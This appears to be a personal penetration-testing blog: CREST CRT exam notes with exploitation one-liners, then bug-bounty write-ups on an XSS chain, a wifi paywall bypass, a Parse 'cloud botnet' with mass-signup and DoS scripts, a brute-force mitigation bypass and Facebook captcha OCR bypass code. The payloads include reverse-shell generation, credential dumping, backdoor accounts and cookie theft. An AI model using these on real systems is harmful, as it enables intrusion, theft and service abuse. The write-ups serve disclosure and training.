Wednesday 31 December 2014

CREST CRT Exam Preparation

I'm going to be taking the CREST CRT exam in January and wanted to share my preparation notes with the world to save everyone else the time and effort of digging up this information to pass the exam.

Note: I have not taken the exam yet, I do not know the answers and am in no way affiliated with CREST.
Note Note: I passed the exam. Due to confidentiality reasons I can't provide any hints I will however leave this post up to assist future participants :)

What have we gota do? 

First things first, the official CREST site and CRT page is here:

To quote the official documentation - "The Certification Examination has two components: a multiple choice written question section and a practical assessment which is also examined using multiple choice answers. The practical assessment tests candidates’ hands-on penetration testing methodology and skills against reference networks, hosts and applications."

For the "written question" section I'd recommend Wikipedia or some SANS/CEH material. For the practical side of things see below.

Getting hands-on!

My goal during the practical exam is to be as quick and efficient as possible. I want to minimize time spent analyzing results, configuring tools or writing custom stuff and maximize time spent answering questions! I plan to use a Windows box with Kali Linux VM. Below is my full list of tools and one-liners:


nmap -T4 -A -Pn -oA scan -v scan
for i in 21 22 23 80 443 445;do cat scan.gnmap|grep " $i/open"|cut -d " " -f2 > $i.txt;doneParse results into txt files per port
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=pwndizzle,smbpass=mypassword -p445 for open shares
dig axfr @ns1.example.comDNS zone transfer (Linux)
tcp.port, tcp.srcport, ip.src, ip.dst, or, andWireshark syntax
tcpdump tcp port 80 -w output.pcap -i eth0Tcpdump syntax
mount /mnt/nfsMount an NFS share
mount -o nolock -t nfs -o proto=tcp,port=2049 /mntMount an NFS share
mount -t cifs -o username=<user>,password=<password>, //WIN_PC_IP/<share name> /mnt/windowsMount a Windows share
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:noMount a Windows share
net use \\<target>\IPC$ "" /u:""Null session
rpcclient -U "" <target>Null session domain info
onesixtyone -c names -i snmphostsSNMP enum
snmpcheck -t -c publicSNMP enum
nslookup -> set type=any -> ls -d <domain>DNS zone transfer (Windows)
nmap --script=smb-check-vulns --script-args=unsafe=1 -p445 <host>SMB vuln scan


use auxiliary/scanner/http/dir_scannerScan for directories
use auxiliary/scanner/http/jboss_vulnscanJBoss scan
use exploit/multi/http/jboss_maindeployerJBoss deploy
use auxiliary/scanner/mssql/mssql_loginMSSQL cred scan
use exploit/windows/mssql/mssql_payloadMSSQL payload
use auxiliary/scanner/mysql/mysql_versionMySQL version scan
use auxiliary/scanner/mysql/mysql_loginMySQL login
use auxiliary/scanner/oracle/oracle_loginOracle login
use exploit/windows/dcerpc/ms03_026_dcomeazymode
use exploit/windows/smb/ms06_040_netapieazymode
use exploit/windows/smb/ms08_067_netapieazymode
use exploit/windows/smb/ms09_050_smb2_negotiate_func_indexeazymode
run post/windows/gather/win_privsShow privs of current user
use exploit/windows/local/bypassuac (check if x86/64 and set target)Bypass uac on win7+
load mimikatz -> wdigestDump creds
load incongnito -> list_tokens -> impersonate_tokenUse tokens
use post/windows/gather/credentials/gppGPP
run post/windows/gather/local_admin_search_enumTest other machines
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exeStandalone meterpreter
use exploit/multi/script/web_deliveryPowershell payload delivery
post/windows/manage/powershell/exec_powershellUpload and run a PS script through a session
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exeGenerate standalone payload


ipconfig /all
Displays the full information about your NIC’s.
ipconfig /displaydns
Displays your local DNS cache.
netstat -nabo
Lists ports / connections with corresponding process (-b), don’t perform looking (-n), all connections (-a) and owning process ID (-o)
netstat -r
Displays the routing table

netstat -anob | findstr “services, process or port”
The “b” flag makes the command take longer but will output the process name using each of the connections.
netsh diag show all
{XP only} Shows information on network services and adapters
net view
Queries NBNS/SMB (SAMBA) and tries to find all hosts in your current workgroup or domain.
net view /domain
List all domains available to the host
net view /domain:otherdomain
Queries NBNS/SMB (SAMBA) and tries to find all hosts in the ‘otherdomain’
net user %USERNAME% /domain
Pulls information on the current user, if they are a domain user. If you are a local user then you just drop the /domain. Important things to note are login times, last time changed password, logon scripts, and group membership
net user /domain
Lists all of the domain users
net accounts
Prints the password policy for the local system. This can be different and superseded by the domain policy.
net accounts /domain
Prints the password policy for the domain
net localgroup administrators
Prints the members of the Administrators local group
net localgroup administrators /domain
as this was supposed to use localgroup & domain, this actually another way of getting *current* domain admins
net group “Domain Admins” /domain
Prints the members of the Domain Admins group
net group “Enterprise Admins” /domain
Prints the members of the Enterprise Admins group
net group “Domain Controllers” /domain
Prints the list of Domain Controllers for the current domain
net share
Displays your currently shared SMB entries, and what path(s) they point to
net session | find / “\\”

arp -a
Lists all the systems currently in the machine’s ARP table.
route print
Prints the machine’s routing table. This can be good for finding other networks and static routes that have been put in place
View the current user
tasklist /v
List processes
taskkill /F /IM "cmd.exe"
Kill a process by its name
net user hacker hacker /add
Creates a new local (to the victim) user called ‘hacker’ with the password of ‘hacker’
net localgroup administrators hacker /add
Adds the new user ‘hacker’ to the local administrators group
net share nothing$=C:\ /grant:hacker,FULL /unlimited
Shares the C drive (you can specify any drive) out as a Windows share and grants the user ‘hacker’ full rights to access, or modify anything on that drive.

One thing to note is that in newer (will have to look up exactly when, I believe since XP SP2) windows versions, share permissions and file permissions are separated. Since we added our selves as a local admin this isn’t a problem but it is something to keep in mind
net user username /active:yes /domain
Changes an inactive / disabled account to active. This can useful for re-enabling old domain admins to use, but still puts up a red flag if those accounts are being watched.
netsh firewall set opmode disable
Disables the local windows firewall

wmic useraccount get name,sid     -  Retrieve name and sid from command line.


apt-get install finger rsh-client jxplorer sipcalcFinger not installed in Kali by default
apt-get install rsh-clientR-tools not installed in Kali by default
uname -aKernel version
cat /etc/<distro>-releaseRelease version
showrev -pRevision
rlogin -l <user> <target>rlogin
rsh <target> <command>rsh
find / -perm +6000 -type f -exec ls -ld {} \; > setuid.txt &Find setuid binaries
finger <username>@<ip>Retrieve user info
mysql -h <ip> -u <user> -p <password>Connect to mysql
oscanner -s <ip> -r <repfile>Oracle scanner


hydra -L users -P passwords -M 21.txt ftpBrute ftp
hydra -L users -P passwords -M 22.txt sshBrute ssh
hydra -L users -P passwords -M 445.txt smbBrute smb

User List


john --wordlist=/usr/share/wordlists/rockyou.txt hashesJTR default


document.write('<img src="' + document.cookie + '" />)XSS steal cookie
sqlmap -u <target> -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/test.php"Targeted scan
sqlmap -u --forms --batch --crawl=10 --cookie=jsessionid=12345 --level=5 --risk=3Automated scan

Wednesday 26 November 2014

Traversal to Redirect to Remote JS XSS

I recently came across an interesting snippet of Javascript that looked exploitable but the path to exploitation wasn't that obvious. This post will be about how I achieved a working XSS.

The Code

The vulnerable page was loaded with a URL something like this:
And contained Javascript looking something like this:
var country =;
var s = document.createElement('script');
var src = '/js/timezone-js/timezone-data[' + country + '].min.js';
s.src = src;

Can you spot how to exploit it? :)


In a nutshell the JS appends a new <script> element to the <head> element. The user is able to modify the country part of the script element as this is retrieved from the URL parameter "c".

Once the above script runs you end up with something like:
<script src="/js/timezone-js/timezone-data[test].min.js"></script>
So how can we exploit this?

From Text to Traversal

In terms of regular inline XSS there are two potential injection points, either directly in the JS or within the HTML output. In this instance neither work because of the way the input is handled and encoding.

We can however use path traversal to load any JS file on the server. For example, to load a legitimate file with traversal we could do this:[UK.min.js]?

But we still have no way to load our own JS...or do we?

From Traversal to Dead End?

The easiest way to get JS execution from the traversal would have been to locate an upload feature or error message on the same domain that allowed the user to control the first few bytes of the response. This would have allowed the inclusion of a JS payload that could have been accessed through the traversal.

For example:
Unfortunately I couldn't find such a place....but I did have an open redirection I could play with.

From Redirection to JS

The open redirection was pretty standard something like:
Open redirection is often classed as medium/low risk but in this instance it was the final piece of the XSS puzzle as it would allow us to redirect a browser offsite to grab remote JS.

Combining the traversal and redirection the complete attack URL was:

Which would cause the in-page JS to create a script tag that would load our malicious remote JS:
<script src="/../../../../accounts/logout/?next=].min.js"><script>

Congratulations you've achieved XSS by loading remote JS from traversal and redirection!

The Fix

I definitely think this functionality could have been handled in a cleaner way using server-side code. A quick fix though would have been to whitelist the country parameter to prevent path traversal.
country = country.replace(/[^\w\-]/g, '');

Final Thoughts

I really enjoyed exploiting this issue as it involved stringing multiple flaws together to achieve a working XSS which at first glance didn't seem possible. I guess the moral of the story is always think outside the box and don't write sloppy Javascript :)

If you have any questions or feedback just drop me a comment below. Pwndizzle out.

Wednesday 22 October 2014

Boingo Hotspot Bypass Analysis

In this post I'll take a look at what seems to be a bypass vulnerability in the current version of Boingo hotspot that allows anyone to access free wifi.


While waiting for my plane at JFK airport I thought I'd check for free wifi, scanning the local area I saw an AP called "Boingo hotspot" and decided to give it a go.

However after connecting to the access point I found out Boingo was a pay only wifi service and all my requests were being redirected to the Boingo site.

Looking over the site I came across the "Good Stuff" feature which appeared to allow access to a small number of whitelisted sites for free. However after visiting one of the Good Stuff links I somehow gained full unrestricted internet access...

Googling this feature it turns out the flaw had already been discovered and publicly disclosed. No where however explained how the flaw worked. Lets take a look.

Secret to the Good Stuff

The Good Stuff feature, in theory, provides access to a small selection of whitelisted sites. For example:

Behind each of those buttons is an interesting looking link, something like this:

It turns out the promoId/promocode function as a kind of username/password and once the link is clicked an authentication process is kicked off. Roughly something like this:

1. After clicking the link the server will return a sessionID ("s"), which is then sent with the promoid/promocode to retrieve temporary credentials.

2. The temporary username and password received are then submitted to login.aspx in a POST request. Notice that the temporary username includes my MAC address, promocode, airport, terminal and a suspicious password-like string "bwpromo!1".


3. Once the login request completes, your ip should have been added to the allowed list and you can now browse the full internet!!1|C01885DBFED1|0|0|0|Promo|0|BIP000000000108|jfk|term7|0|1412015104&logoutURL=

What the heck is going on?

The main issue is that whitelist restrictions for "Good Stuff" users are simply not enforced. There should be some server-side mechanism that is monitoring and filtering http requests to only allow content from whitelisted sites, this seems to be missing or at least was not enabled.

Also I'm not too sure why they included an authentication process for the free content. For paying customers authentication makes sense but for free content it shouldn't be needed. Tracking users is one possibility but this could have been done with cookies, headers or POST requests.

Final thoughts

With only an hour to spare before my flight it was a shame I didn't have longer to play with the Boingo hotspot. When you come across issues as bizarre as this you just know there are more security holes just lurking below the surface :)

Thanks for reading, feedback and questions are welcome, just drop me a comment below.

Wednesday 10 September 2014

Building a Cloud Botnet on

Today I'm going to talk about and a trial account feature that allowed me to build a cloud botnet.

Parse is a cloud based app service that lets you deploy and run your app code in the cloud making building and maintaining apps easier. Facebook bought the company in 2013 and with it being eligible for the bounty program I thought I'd take a look for security issues.

Want a free account?

Parse offer free trial accounts with 20GB storage, 2TB traffic per month, a maximum of 30 requests/sec and the ability to run one process at a time for a maximum of 15 seconds before it's killed.

The stats above are for one account, but how about if we sign up for two accounts? Well that would effectively double all my quotas. How about a hundred, thousand or a million accounts? I could massively increase my limits and cause all kinds of mischief.

Taking a look at the registration page (in 2013) there was no hardening at all. Account registration was as simple as sending this POST request:

In 2013 no email verification was required, no CSRF token, no captcha, no throttling. The security team had basically missed the registration page. One year later, email verification is still not required. A CSRF header is now required and so is a session cookie. But there still isn't any anti-automation so anyone could register a million trial accounts.

Building my army

In 2013 it was easy to register accounts by just using Burp Intruder to send multiple registration POST requests. Because of the new session/CSRF requirements in 2014 I created a python script to perform registration.

The script will connect to Parse, grab session info and CSRF header, register an account, register an app for that account then grab the API keys which we'll need to communicate with our bots.

My account creation script:
import requests
import re
from random import randint

for i in xrange(0,100,1):
    user = "blahblah" + str(randint(100,999))
    print user

    print "[+] Getting Parse main page"    
    s = requests.Session()
    r = s.get('')
    global csrf;
    csrf = re.findall('[a-zA-Z0-9+/]{43}=', r.text);
    print "-----CSRF Token: " + csrf[0]
    s.headers.update({'X-CSRF-Token': csrf[0]})

    print("[+] Posting registration request");
    payload = {'user[name]':user, 'user[email]':user+'', 'user[password]':'password1'};
    r ='', params=payload)
    print r.status_code

    print("[+] PUTing new app name");
    s.headers.update({'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'})
    payload = {'user[company_type]':'individual','parse_app[name]':'blahblahblah'+str(randint(100,999))};
    r = s.put('', params=payload);
    print r.status_code

    print("[+] Grabbing keys");
    r = s.get('');
    print r.status_code
    print user +':'+ str(keys[0]).replace('<input type="text" value="','') + ':' + str(keys[5]).replace('<input type="text" value="','')

Using the Parse tools to deploy code

There are two ways to deploy code either using the Parse tool (a packaged python script) or directly through the API ( Directly connecting to the API is the cleaner option but it would have taken me a while to reverse the Parse tool and extract the integrity check code. To save time I just used the Parse tool as is. To use the tool though you need to create a project locally and add your apps before you can deploy code.

Create a new project:
parse new parsebotnet

Add every app locally:
#!/usr/bin/expect -f
for {set i 1} {$i < 101} {incr i 1} {
set timeout -1
spawn parse add
expect "Email:*"
send -- "test$\r"
expect "Password:*"
send -- "test$i\r"
expect "Select an App:"
send -- "1\r"
send -- "\r"

You can then grep the appids and keys from the global.json settings file:
cat global.json|grep applicationId|cut -d "\"" -f4 > appid
cat global.json|grep masterKey|cut -d "\"" -f4 > keys

To send code to Parse you just put code in the cloud folder on your local machine and run the deploy command. I started off by putting the helloworld program in main.js:
Parse.Cloud.define("hello", function(request, response) {
  response.success("Hello world!");

And uploaded it to every bot using a bash for loop:
for i in {1..100};do echo "Job#$i";parse deploy testapp1$i & done;

Not the cleanest approach but the Parse tool does all of the leg work.

Running Code

With the bot accounts created and code uploaded I could call the API and have the bots actually run my code. The simple approach was just using Curl:

exec 5<appid
exec 6<key
while [[ $eof -eq 0 ]]
 if read l1<&5; then
  read l2 <&6
  curl -X POST -H "X-Parse-Application-Id: $l1" -H "X-Parse-Master-Key: $l2" -H "Content-Type: application/json" -d {}
  printf "\n"

I also put together a more snazzy python script with threading code from stackoverflow:
import requests
import re
from random import randint
import threading
import time
import Queue
import json

with open("appid") as f:
    appid = f.readlines()

with open("keys") as f:
    key = f.readlines()

s = requests.Session()

def callapi(x):
    s.headers.update({'X-Parse-Application-Id': appid[x].rstrip()})
    s.headers.update({'X-Parse-Master-Key': key[x].rstrip()})
    payload = {'' : ''}
    r ='', data=json.dumps(payload))
    print "No: " + str(x) + "  Code:" + str(r.status_code) + "  Dataz:" + str(r.text)

queue = Queue.Queue()

class ThreadUrl(threading.Thread):

  def __init__(self, queue):
    self.queue = queue

  def run(self):
    while True:
      #grabs host from queue
      j = self.queue.get()

      #grabs urls of hosts and prints first 1024 bytes of page

      #signals to queue job is done

start = time.time()
def main():

  #spawn a pool of threads, and pass them queue instance
  for m in range(160):
    t = ThreadUrl(queue)

  #populate queue with data  
  for n in xrange(0,1000,1):

  #wait on the queue until everything has been processed    

print "Elapsed Time: %s" % (time.time() - start)

Do something cool!

At this point I'm sure a few of you are like this:

And I guess you're wondering, after all this configuration, what can you actually do?

Well Parse allows you to process data and send HTTP requests. For a bad guy this means they could do things like mine bitcoins, crack hashes, DOS attacks or proxy malicious requests. For testing purposes I decided to focus on bitcoin mining and DOS proof of concepts.

$$$ Mining some coin $$$

Knowing next to nothing about bitcoin mining I did a little Googling and came across the post here that had a great practical explanation of mining. As mining basically consists of SHA256 hashing I decided to create a hashing benchmark script for Parse. As Parse uses Javascript I took the SHA256 crypto JS here and uploaded it to Parse with a for loop and timer.

Parse.Cloud.define("sha256", function(request, response) {

<insert CryptoJS code>

CryptoJS.SHA256("Message" + i);
response.success("time: " + ((new Date())-start)/1000);

Testing different iteration values I found one Parse instance could handle roughly 40,000 hashes per second which is pretty slow. Using the threaded python script I included above I continually called multiple instances and could hit about 6,000,000 hashes per second. But even this is no where near the speeds of real mining hardware. (Also real mining uses double SHA256 so the 6Mh/s is probably nearer 3Mh/s in real terms)

Part of the problem is the 15 second time limit on Parse processes, another issue is Parse have throttling in place so if you make too many API requests they start blocking connections. So bitcoin mining seemed possible but not practical with the current restrictions.

Denial Of Service

Using multiple trial accounts and some form of amplification I was curious how high I could get my outbound traffic volume (going from Parse to my target).

Starting with some simple httpRequest code I was able to get my instance to send thirty outbound requests for every one API request, proving amplification was possible. Two things to note though, the outbound requests go at a max rate of around 15 requests a second, also you need to remove the success/error response as that will close the process.

Example test code is below:
Parse.Cloud.define("amptest", function(request, response) {

        url: 'http://myip/hello',
        method: 'POST',
        body: {
        success: function(httpResponse) {
       error: function(httpResponse) {
            //response.error("Some error: "+httpResponse.status);

When scaling this up though the bottleneck is the same as the bitcoin mining, 15 second processes and max API requests per second limit the throughput. But is there any way around these restrictions?

C&C in the cloud?

It dawned on me that instead of using my workstation as the command and control I could use one of my apps as the C&C. I could send one request to my C&C app and he would communicate with all the other apps. But why stop at one C&C? Having one master, multiple slave C&C's and a pool of workers would in theory help increase throughput as I would be sending requests from multiple Parse ip addresses.
I created some recursive app code that included a list of every bot's appid and key and pushed this to every bot. The code would select bots at random and request that they run the same code. I passed a counter parameter that was incremented after each request to give the illusion of a tiered infrastructure. When the counter hit the "worker tier", instead of calling other bots, the bot would send multiple http requests to the target site.

With multiple workers all simultaneously connecting to the target ip i got something like this:

The source ip is Parse, the destination is my local machine. Looking at the "Time" column you can see a throughput of roughly 600-1000 requests per second. For me this was a promising start and I'm sure with some code tweaks, more bots and more than one external ip, the requests per second could have been increased substantially.

90's worm + 2014 cloud = CLOUD WORM!?

Although I didn't have time to build a working POC I think it may be possible to build a cloud worm on Parse. In a nutshell, as Parse allow accounts to run code and send http requests, there is the possibility that a Parse app could itself create a new account, deploy and then run code. The new account would then repeat this process and so on, gradually consuming the entire cloud's resources.

Cloud worm POC is this weeks homework, class dismissed ;)

Final Thoughts

Letting people run code on your servers is a risky business. To prevent abuse you need a solid sandbox and tight resource restrictions/monitoring. In this post I've only scratched the surface of Parse looking at some super obvious issues. I wish I'd had more time to dig into the cloud worm possibilities as well as background jobs which looked interesting.

Mitigation-wise anti-automation and email verification on the sign-up page would have helped. As would tighter inbound/outbound throttling/resource restrictions for trial accounts and also blocking app to app access. I don't think Facebook/Parse chose to implement any of these fixes and instead decided to focus on monitoring for suspicious resource usage.

Questions, comments and corrections are always appreciated! Thanks for reading.

Pwndizzle out.

Tuesday 26 August 2014

Pagely Brute Force Mitigation Bypass

A while back I was looking at one of Facebook's acquisitions, Onavo, and came across their blog which was using a Wordpress install managed by Pagely. While testing for ways to brute force the login page I discovered a brute force mitigation bypass that not only affected Onavo but also every other Pagely protected site :)

Detect Wordpress? Look for wp-login.php

Wordpress is pretty common and actually pretty secure these days. One area that still needs some work though is protection for the default login page wp-login.php. Most installations leave this page publicly exposed and a lot do not implement the recommended brute force mitigations here:

Onavo took the easy approach and used Pagely. Pagely offer managed security which in theory should mean you are more secure...

Testing for bruteforce

So let's try and brute force Onavo's wp-login page.

You can see after only a few requests we start getting redirected (302). This redirection actually takes you to a Pagely captcha page.

The magical "pagelyvalid" cookie

I was curious how they implemented the verification once past the captcha so took a look at the response and saw that the captcha check just set a cookie called "pagelyvalid" to true. Hmmm. Lets try our brute force attack again but this time including the magical pagelyvalid cookie.

Lots of 200's. So simply including the pagelyvalid true cookie we can bypass the Pagely brute force mitigation and guess passwords night and day. And like I said at the start this didn't just affect Onavo but every site that used the Pagely service. Yikes!

Final Thoughts

A lot of sites miss brute force mitigations and rate limiting in general. Third parties can offer a quick fix but it's important to remember you are trusting your security to that third party and assuming they will do a good job (which isn't always the case!).

Both Facebook and Pagely responded reasonably quickly (the Pagely CEO even sent me a message!) and a fix has now been deployed. Hope you guys found this interesting, as usual if you have questions or suggestions just drop me a comment below.

Pwndizzle out

Thursday 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.

The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).

The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:

Let's look at some ways to bypass the text captcha :)

A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...

Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.

The logic flaws were interesting but let's not forget OCR as well!

Back to the image...

Let's take a look at a Facebook captcha image:

When thinking about OCR analysis there's some things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad
I did some testing with Tesseract and found noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above will return invalid characters or no response at all. To improve Tesseract results I needed some way to get rid of the noise and repair damaged characters.

Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

So first up I loaded the image and increased its size, I found processing a smaller image was less accurate and would reduce the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size

Next I removed the background noise. By selecting by black and then shrinking the selection, the thin black lines would be unselected, leaving just the black letters. To actually paint over the noise I just had to re-grow my selection, invert and paint white.
#Select by color black
#Shrink selection by 1 pixel
#Grow selection by 2 pixels
#Fill black
#Invert selection
#Fill white

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
#Translate selection up 4 pixels and paint
#Translate selection down 10 pixels and paint

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_file_save(image, drawable, file, file)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"

As an example, cleaning the image above I got this:

Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word mode (-psm 8) and used a custom character set (nobatch fb).
tesseract.exe test.jpg output -psm 8 nobatch fb

I created the fb character set in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs", it contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890

Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking don't actually do this!)

Theoretically though if you did want to build a fully functioning script you'd just need to take the python script from my Bugcrowd post and cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
from urllib.error import *
from urllib.request import *
from urllib.parse import *
import re
import subprocess

def getpage():
        print("[+] POSTing to fb");
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY;;')
        #Send request and analyse response
        f = urlopen(request, data)
        response ='utf-8')
        global ccode
        ccode = re.findall('[a-z0-9-]{43}', response)
        global chash
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response");
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

def getcaptcha(i):
        print("[+] Downloading Captcha");
        captchaurl = ""+ccode[0]+"&captcha_challenge_hash="+chash[1]
    except URLError as e:
        print ("*****Error: Cannot retrieve URL*****");

print("[+] Start!");
for i in range(0, 1000):
    #Download page and parse data
    #Download captcha image
print("[+] Finished!");

Final Results

So I guess you're wondering, how accurate was Tesseract? Well on a sample of 50 captchas that had been cleaned with Gimp, Tesseract was able to analyse them 100% correctly about 20% of the time. However taking into account the logic flaws the actual pass rate jumped to 50%.

Some example results:

It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.

Facebook Fix #1

After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:

Unfortunately this had little effect on the captcha strength as it's the noise to character relative thickness that mattered not the absolute thickness. Making the noise thicker and characters thinner, would have prevented noise removal through selection shrinking.

Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass-rate, I'm sure with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out

#Gimp-Fu cleaning script, based on stackoverflow script here:

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    #Select by color black
    #Shrink selection by 1 pixel
    #Grow selection by 2 pixels
    #Fill black
    #Invert selection
    #Fill white
    #Invert selection
    #Translate selection up 4 pixels and paint
    #Translate selection down 10 pixels and paint
    #Resize image
    pdb.gimp_file_save(image, drawable, file, file)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)